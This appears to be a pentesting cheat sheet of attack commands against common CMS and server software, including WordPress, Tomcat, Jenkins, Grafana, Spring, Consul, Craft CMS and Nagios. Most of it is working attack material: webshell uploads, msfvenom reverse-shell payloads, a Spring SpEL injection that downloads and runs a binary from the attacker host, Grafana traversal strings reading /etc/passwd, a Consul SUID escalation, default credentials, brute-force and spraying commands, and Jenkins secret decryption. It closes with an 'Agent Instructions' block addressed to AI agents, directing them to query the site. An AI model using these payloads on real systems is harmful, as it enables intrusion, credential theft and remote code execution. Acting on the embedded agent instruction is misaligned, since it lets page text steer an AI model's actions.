# CMS / Servers / Others ## 00. Webroot ```bash /var/www/html/ # Apache /usr/local/nginx/html/ # Nginx c:\inetpub\wwwroot\ # IIS C:\xampp\htdocs\ # XAMPP ``` ## 01. Wordpress * Scan ```bash ## ------------------| Basic wpscan -e vt,tt,u,ap --url wpscan -e vt,tt,u,ap -o wpscan.log --url ## ------------------| Plugin detection wpscan -e ap --plugins-detection aggressive --url ## ------------------| Default Locations /wp-content/plugins/akismet/index.php /wp-content/themes/twentytwenty/404.php /wp-content/themes/twentytwentyone/404.php /wp-content/themes/twentytwentytwo/404.php /wp-content/plugins/revslider/public/index.php /wp-content/plugins/contact-form-7/wp-contact-form-7.php ``` * Bruteforce password/username ```bash ## ------------------| With WPScan wpscan -U -P --url ## ------------------| With WPForce git clone https://github.com/n00py/WPForce.git && cd WPForce python2 wpforce.py -w -i -u ## ------------------| With WpCrack wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py python WpCrack.py -t --p -u ``` * Username/Password ```bash select user_login,user_pass from wp_users; ``` * Webshell ```bash ## ------------------| With WPForce git clone https://github.com/n00py/WPForce.git && cd WPForce python yertle.py -u "" -p "" -t "" -i ## Or ## ------------------| Create Plugin wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php zip -r shell.zip shell.php ## ------------------| Upload to http:///wp-admin/plugin-install.php ## ------------------| Execute shell http:///wp-content/plugins/shell/shell.php?cmd=id curl -v "http:///wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')" ## ------------------| Reverse shell (default port:443) curl -v "http:///wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":""})')" curl -v "http:///wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"","port":"4545"})')" ``` ### 01.1 XML-RPC * Automated \[[python-wordpress-xmlrpc](https://python-wordpress-xmlrpc.readthedocs.io/en/latest/)] ```bash ## ------------------| Install pip install python-wordpress-xmlrpc ## ------------------| Example I - Get Profile ### use bpython intractive from wordpress_xmlrpc import Client import wordpress_xmlrpc.methods as wp client = Client('http://h4rithd.com/xmlrpc.php', 'username', 'password') client.call(wp.users.GetProfile()) ``` * General ```bash ## ------------------| Lists all available XML-RPC methods on the server curl -X POST http://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" --data 'system.listMethods' ## ------------------| Get information about Parameters and Return Type of a Method curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'system.methodSignaturemethod_nameUSERNAMEPASSWORD' ## ------------------| Get Description of a Method curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'system.methodHelpmethod_nameUSERNAMEPASSWORD' ## ------------------| Send a Pingback Notification curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'pingback.pingSOURCE_URLTARGET_URL' ## ------------------| Get Pingbacks curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'pingback.extensions.getPingbacksURL' ``` * Posts

## ------------------| Creates a new post
#### Core WordPress (wp.newPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.newPost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>post_type</name><value><string>post</string></value></member><member><name>post_title</name><value><string>Hello, World!</string></value></member><member><name>post_content</name><value><string>This is my first post via XML-RPC.</string></value></member><member><name>post_status</name><value><string>publish</string></value></member></struct></value></param></params></methodCall>'
#### MetaWeblog API (metaWeblog.newPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>title</name><value><string>New Post Title</string></value></member><member><name>description</name><value><string>This is the content of the new post.</string></value></member><member><name>categories</name><value><array><data><value><string>General</string></value></data></array></value></member><member><name>post_status</name><value><string>publish</string></value></member></struct></value></param></params></methodCall>'
#### Blogger API (blogger.newPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>blogger.newPost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>title</name><value><string>New Post Title</string></value></member><member><name>content</name><value><string>This is the content of the new post.</string></value></member><member><name>categories</name><value><array><data><value><string>General</string></value></data></array></value></member><member><name>publish</name><value><boolean>1</boolean></value></member></struct></value></param></params></methodCall>'

## ------------------| Edits an existing post
#### Core WordPress (wp.newPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.editPost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>123</int></value></param><param><value><struct><member><name>post_title</name><value><string>Updated Title</string></value></member><member><name>post_content</name><value><string>Updated content here.</string></value></member></struct></value></param></params></methodCall>'
#### MetaWeblog API (metaWeblog.editPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.editPost</methodName><params><param><value><string>POST_ID</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>title</name><value><string>Updated Title</string></value></member><member><name>description</name><value><string>Updated content of the post.</string></value></member></struct></value></param></params></methodCall>'
#### Blogger API (blogger.editPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>blogger.editPost</methodName><params><param><value><string>POST_ID</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>title</name><value><string>Updated Title</string></value></member><member><name>content</name><value><string>Updated content of the post.</string></value></member></struct></value></param></params></methodCall>'

## ------------------| Retrieves a specific post
#### Core WordPress (wp.getPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getPost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>123</int></value></param></params></methodCall>'
#### MetaWeblog API (metaWeblog.getPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.getPost</methodName><params><param><value><string>POST_ID</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param></params></methodCall>'

## ------------------| List All Posts
#### Core WordPress (wp.getPosts)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getPosts</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>number</name><value><int>10</int></value></member></struct></value></param></params></methodCall>'

## ------------------| Retrieve Recent Posts 
#### MetaWeblog API (metaWeblog.getRecentPosts)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.getRecentPosts</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>5</int></value></param></params></methodCall>'

## ------------------| Retrieve a List of Blogs for the User
#### Blogger API (blogger.getUsersBlogs)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>blogger.getUsersBlogs</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param></params></methodCall>'

## ------------------| Deletes a post
#### Core WordPress (wp.deletePost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.deletePost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>123</int></value></param></params></methodCall>'
#### MetaWeblog API (metaWeblog.deletePost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.deletePost</methodName><params><param><value><string>POST_ID</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param></params></methodCall>'
#### Blogger API (blogger.deletePost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>blogger.deletePost</methodName><params><param><value><string>POST_ID</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><boolean>1</boolean></value></param></params></methodCall>'

* Media ```bash ## ------------------| Uploads a new media file #### Core WordPress (wp.uploadFile) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.uploadFile1USERNAMEPASSWORDnameexample.jpgtypeimage/jpegbits/9j/4AAQSkZJRgABAQEAAAAAAAD/2wCEAAgGBgcG...overwrite1' #### MetaWeblog API (metaWeblog.newMediaObject) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'metaWeblog.newMediaObject1USERNAMEPASSWORDnameexample.jpgtypeimage/jpegbits/9j/4AAQSkZJRgABAQEAAAAAAAD/2wCEAAgGBgcG...' ## ------------------| Retrieve a Specific Media Item #### Core WordPress (wp.getMediaItem) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.getMediaItem1USERNAMEPASSWORD456' ## ------------------| Get a List of Media Files #### Core WordPress (wp.getMediaLibrary) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.getMediaLibrary1USERNAMEPASSWORDnumber10' ``` * Users ```bash ## ------------------| Retrieve a List of Users #### Core WordPress (wp.getUsers) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.getUsers1USERNAMEPASSWORD' #### Blogger API (blogger.getUserInfo) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'blogger.getUserInfoUSERNAMEPASSWORD' ## ------------------| Retrieve a Specific User #### Core WordPress (wp.getUser) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.getUser1USERNAMEPASSWORD789' ## ------------------| Retrieve Profile Information #### Core WordPress (wp.getProfile) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.getProfile1USERNAMEPASSWORD' ## ------------------| Edit Profile Information #### Core WordPress (wp.editProfile) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.editProfile1USERNAMEPASSWORDfirst_nameHarith' ``` * Comments ```bash ## ------------------| Add a New Comment #### Core WordPress (wp.newComment) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.newComment1USERNAMEPASSWORD123This is a new comment.' ## ------------------| Retrieve a List of Comments #### Core WordPress (wp.getComments) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.getComments1USERNAMEPASSWORDpost_id123' ## ------------------| Retrieve a Specific Comment #### Core WordPress (wp.getComment) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.getComment1USERNAMEPASSWORD456' ## ------------------| Edit an Existing Comment #### Core WordPress (wp.editComment) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.editComment1USERNAMEPASSWORD456contentUpdated comment text.' ## ------------------| Delete a Comment #### Core WordPress (wp.deleteComment) curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d 'wp.deleteComment1USERNAMEPASSWORD456' ``` ## 02. Joomla ```bash ## ------------------| Identify version # Navigate to /administrator/manifest/files/joomla.xml # Check this tag 3.7.5 ## ------------------| Run scan joomscan -u ``` * CVE-2023-23752 (Authentication bypass resulting in an information leak) ```bash ## ------------------| Affected Versions Joomla! < 4.2.8 ## ------------------| Manual Expo curl 'http:///api/index.php/v1/config/application?public=true' ## ------------------| Automated git clone https://github.com/ThatNotEasy/CVE-2023-23752 && cd CVE-2023-23752 pip3 install -r requirements.txt python3 joomla.py ``` ## 03. Drupal #### 03.1 Enumerations ```bash ## ------------------| Username enumeration ### Check if we can register new user (search for "name is already taken") /user/register ### Check access status /user/ /user/1 ### is 403 --> user exist ### is 404 --> doesn't exist ## ------------------| Hidden pages wfuzz -c -z range,1-500 --hc 404 http:///node/FUZZ ``` #### 03.2 Upload shell ```bash ## ------------------| Check "plugin php" status /modules/php ### if status is 403 --> "plugin php" exists/installed ## ------------------| Install "plugin php" Modules --> Check for PHP "Filter" --> Save ## ------------------| Upload shell Add content --> Basic Page/Article --> --> select "PHP code in Text format" --> Preview ``` ## 04. Tomcat ```bash ## ------------------| Endpoint permissions /manager/html # <--- roles="manager-gui" /manager/text/list # <--- roles="manager-script" [If we have /manager, Then we can use curl to upload war file :)] /host-manager/html # <--- roles="admin-gui" ## ------------------| Path Normalization /manager/notexsits/..;/html/ /manager/;name=notexsits/html/ /;name=notexsits/manager/ # <--- not work for upload war files /notexsits/..;/manager/ # <--- not work for upload war files ## Remember to put '/' at the end ^ ## ------------------| Common Creds tomcat:s3cret tomcat:s3cr3t admin:s3cr3t tomcat:tomcat admin:admin admin:tomcat tomcat:Tomcatadm tomcat:TomcatAdm tomcat:Tomcatadn admin: ## ------------------| Upload paths /manager/deploy?war=file&path=/shell ## Tomcat6 /manager/text/deploy?path=/shell ## Tomcat7 and above ## ------------------| Upload via curl msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4545 -f war > shell.war curl -u 'username:password' -T shell.war http://:8080/manager/text/deploy?path=/h4rithd ## ------------------| Manually Upload msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4545 -f war > shell.war ## Then put the shell.war file to \tomcat\webapps\shell.war directory ## Then use \bin\startup.[sh/bat] file to restart the service and extract the war file. ## Now you can use http:///shell/ ``` ## 05. Nginx * [Path traversal via misconfigured NGINX alias.](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/) ```bash ## ------------------| If code look like this location /admin { <--code--> } ## ------------------| It has LFI; try this admin../config.php ``` ## 05. SharePoint / OWA #### 05.1 SharePoint ```bash ## ------------------| Important directories /_layouts/viewlsts.aspx ``` #### 05.2 OWA ```bash ## ------------------| Setup git clone https://github.com/byt3bl33d3r/SprayingToolkit cd SprayingToolkit/ pip3 install -r requirements.txt ## ------------------| Create Usernames List (the default is {f}{last}) python3 spindrift.py users.txt --target > newuserlist.txt python3 spindrift.py users.txt --format "{f}.{last}" --target >> newuserlist.txt python3 spindrift.py users.txt --format "{first}.{last}" --target >> newuserlist.txts python3 spindrift.py users.txt --format "{first}.{l}" --target >> newuserlist.txt python3 spindrift.py users.txt --format "{first}{last}" --target >> newuserlist.txt python3 spindrift.py users.txt --format "{first}{l}" --target >> newuserlist.txt ## ------------------| Bruteforce python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01 python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01 ``` ## 06. Jenkins * Interesting endpoints ```bash /manage /script /credentials ``` * Configaration files ```bash ## ------------------| Linux /var/jenkins_home/config.xml /var/jenkins_home/users/users.xml /var/jenkins_home/credentials.xml /var/jenkins_home/secrets/master.key /var/jenkins_home/users/admin_*/config.xml /var/jenkins_home/secrets/hudson.util.Secret /var/jenkins_home/secrets/initialAdminPassword /var/lib/jenkins/config.xml /var/lib/jenkins/users/users.xml /var/lib/jenkins/credentials.xml /var/lib/jenkins/secrets/master.key /var/lib/jenkins/users/admin_*/config.xml /var/lib/jenkins/secrets/hudson.util.Secret /var/lib/jenkins/secrets/initialAdminPassword ## ------------------| Windows C:\Users\\AppData\Local\Jenkins\.jenkins\secrets C:\Users\\AppData\Local\Jenkins\.jenkins\config.xml C:\Users\\AppData\Local\Jenkins\.jenkins\credentials.xml C:\Users\\AppData\Local\Jenkins\.jenkins\users\users.xml C:\Users\\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml C:\Users\\AppData\Local\Jenkins\.jenkins\secrets\master.key C:\Users\\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret ``` * Reset password \[Read full post from [here](https://blog.searce.com/jenkins-change-the-forgotten-password-525169ba1c34)] ```bash ## ------------------| Methord I (Reset Password) ## Edit following file sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml ## Bcrypt password will store under tag [here i used h4rithd] #jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S ## Restart the service sudo systemctl restart jenkins ## ------------------| Methord II (Decrypt Password using console) ## If you have access to /script then follow below url ## Get password hash from \users\\config.xml hudson.util.Secret.decrypt '' ## ------------------| Methord III (Decrypt Password offline) ## Download following files /var/jenkins_home/credentials.xml /var/jenkins_home/secrets/master.key /var/jenkins_home/secrets/hudson.util.Secret ## Get ssh keys git clone https://github.com/hoto/jenkins-credentials-decryptor.git && cd jenkins-credentials-decryptor && make build ./bin/jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c credentials.xml -o text ## Get Password pip install pycryptodome ``` * [CVE-2024-23897](https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability) | Jenkins <= 2.441 ```bash ## ------------------| Manual wget http:///jnlpJars/jenkins-cli.jar java -jar jenkins-cli.jar -s connect-node '@/etc/passwd' java -jar jenkins-cli.jar -s reload-job '@/etc/passwd' ## ------------------| Automate wget https://www.exploit-db.com/raw/51993 -O expo.py python3 expo.py -u http://$IP:8080 -p /etc/passwd ``` * Remote Code Execution {% tabs %} {% tab title="Low level user" %} * Create New Job ![](/files/8KD53BFy3kHOZ0TKzgAw) ![](/files/QZluL6lZFKdCpiIA2q5b) * Schedule Method ![](/files/s39jaOg1zbrqjGegekSJ) ![](/files/jcwnM3Qf4AFGXCdKaqsH) ![](/files/lqcRyECWzsvywPUrLlqp) ![](/files/bc2OaanIHvzEPplf2RCQ) * Trigger Remotely Method ![](/files/DdPDJ2l0m3w5A18AkXHa) ![](/files/emFfI3Jilb0RtWkj0Uaf) ```bash ## ------------------| Trigger the job curl "http://[username]:[token]@[host]/job/[job name]/build?token=[token name]" ## Ex: curl "http://h4rithd:11afe9af0327e90fed163da849a39837bc@object.htb:8080/job/TestRun/build?token=h4rithdToken" ``` ![](/files/YLqE3L4SAv6OeCIyI65R) ![](/files/ZKMhiBiFh3CdrwSxt0E4) {% endtab %} {% endtabs %} ## 07. Grafana * [Best ](https://github.com/jas502n/Grafana-CVE-2021-43798) * Config files ```bash ## ------------------| /etc/grafana/grafana.ini $WORKING_DIR/conf/defaults.ini /usr/local/etc/grafana/grafana.ini ``` * [Unauthorized reading of files in Grafana](https://github.com/Vulnmachines/grafana-unauth-file-read) \[CVE-2021-43798] - [videoPOC](https://www.youtube.com/watch?v=mMEzHP96Jhg) ```bash /public/plugins/alertlist/../../../../../../../../etc/passwd /public/plugins/alertmanager/../../../../../../../../etc/passwd /public/plugins/annolist/../../../../../../../../etc/passwd /public/plugins/barchart/../../../../../../../../etc/passwd /public/plugins/bargauge/../../../../../../../../etc/passwd /public/plugins/canvas/../../../../../../../../etc/passwd /public/plugins/cloudwatch/../../../../../../../../etc/passwd /public/plugins/dashboard/../../../../../../../../etc/passwd /public/plugins/dashlist/../../../../../../../../etc/passwd /public/plugins/debug/../../../../../../../../etc/passwd /public/plugins/elasticsearch/../../../../../../../../etc/passwd /public/plugins/gauge/../../../../../../../../etc/passwd /public/plugins/geomap/../../../../../../../../etc/passwd /public/plugins/gettingstarted/../../../../../../../../etc/passwd /public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd /public/plugins/grafana/../../../../../../../../etc/passwd /public/plugins/graph/../../../../../../../../etc/passwd /public/plugins/graphite/../../../../../../../../etc/passwd /public/plugins/heatmap/../../../../../../../../etc/passwd /public/plugins/histogram/../../../../../../../../etc/passwd /public/plugins/influxdb/../../../../../../../../etc/passwd /public/plugins/jaeger/../../../../../../../../etc/passwd /public/plugins/live/../../../../../../../../etc/passwd /public/plugins/logs/../../../../../../../../etc/passwd /public/plugins/loki/../../../../../../../../etc/passwd /public/plugins/mixed/../../../../../../../../etc/passwd /public/plugins/mssql/../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../etc/passwd /public/plugins/news/../../../../../../../../etc/passwd /public/plugins/nodeGraph/../../../../../../../../etc/passwd /public/plugins/opentsdb/../../../../../../../../etc/passwd /public/plugins/piechart/../../../../../../../../etc/passwd /public/plugins/pluginlist/../../../../../../../../etc/passwd /public/plugins/postgres/../../../../../../../../etc/passwd /public/plugins/prometheus/../../../../../../../../etc/passwd /public/plugins/stat/../../../../../../../../etc/passwd /public/plugins/state-timeline/../../../../../../../../etc/passwd /public/plugins/status-history/../../../../../../../../etc/passwd /public/plugins/table-old/../../../../../../../../etc/passwd /public/plugins/table/../../../../../../../../etc/passwd /public/plugins/tempo/../../../../../../../../etc/passwd /public/plugins/testdata/../../../../../../../../etc/passwd /public/plugins/text/../../../../../../../../etc/passwd /public/plugins/timeseries/../../../../../../../../etc/passwd /public/plugins/welcome/../../../../../../../../etc/passwd /public/plugins/xychart/../../../../../../../../etc/passwd /public/plugins/zipkin/../../../../../../../../etc/passwd ``` ## 08. Consul ```bash echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh curl --header "X-Consul-Token: " --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register dash -p ``` ## 09. Spring Framework * [Spring4Shell \[CVE-2022-22965\]](https://github.com/sunnyvale-it/CVE-2022-22965-PoC) ```bash ### Spring Boot version 2.6.5 ## ------------------| Manual wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py python3 exploit-core.py --url http://10.10.11.204:8080/ ``` * Spring Cloud Function Vulnerability(CVE-2022-22963) ```bash ## ------------------| Manual msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=4545 -f elf > h4rithd.elf curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl /h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter' curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter' curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter' ## ------------------| Metasploit use exploit/multi/http/spring_cloud_function_spel_injection ``` ## 10. Craft CMS * [CVE-2023-41892](https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892) ```bash ## ------------------| Versions between 4.0.0-RC1 – 4.4.14 ## Check for phpinfo curl -sk "https://craftcms-vuln.ddev.site" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}' ## ------------------| RCE Path ## Create h4rithd.msl file ## ------------------| Create the vuln.png exiftool -comment="" vuln.png ## ------------------| Expolit curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -H 'Content-Type: multipart/form-data' -F 'action=conditions/render' -F 'configObject[class]=craft\elements\conditions\ElementCondition' -F 'config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}' -F 'filename=@h4rithd.msl' curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:/tmp/php*"}}}' curl -k "http://surveillance.htb/shell.php" -x localhost:8080 --output - ## ------------------| Metasploit use exploit exploit/multi/http/cmsms_object_injection_rce set RHOSTS set ForceExploit trueh4rith exploit ``` ## 11. Nagios ```bash ## ------------------| Authenticate with API ### Create token curl -ksX POST https:///nagiosxi/api/v1/authenticate -d 'username=&password=&valid_min=500' ### Login to the server https:///nagiosxi/?token= ### Add new user curl -XPOST --insecure "https:///nagiosxi/api/v1/system/user?apikey=&pretty=1" -d "username=h4rithd&password=h4rithd&name=h4rithd&email=h4rithd@localhost&auth_level=admin" ### Login using hrithd:h4rithd creds ### Use SQL map to get admin api key sqlmap -u "https:///nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=" --level 5 --risk 3 -p id --batch -D nagiosxi --dump -T xi_users ```

Remote Code Execution

![](/files/opgK0kMDbqRtGQ0RjEqD)![](/files/f7YbDmBEK05vPUBodvs3)![](/files/Gm2ARhxV4vD4AXiDQMMF)![](/files/LjUHFBfQ1hJA10Jht0X6)![](/files/Fkm7dLSgxKQUAVlAcJgo)

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.h4rithd.com/other/cms.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.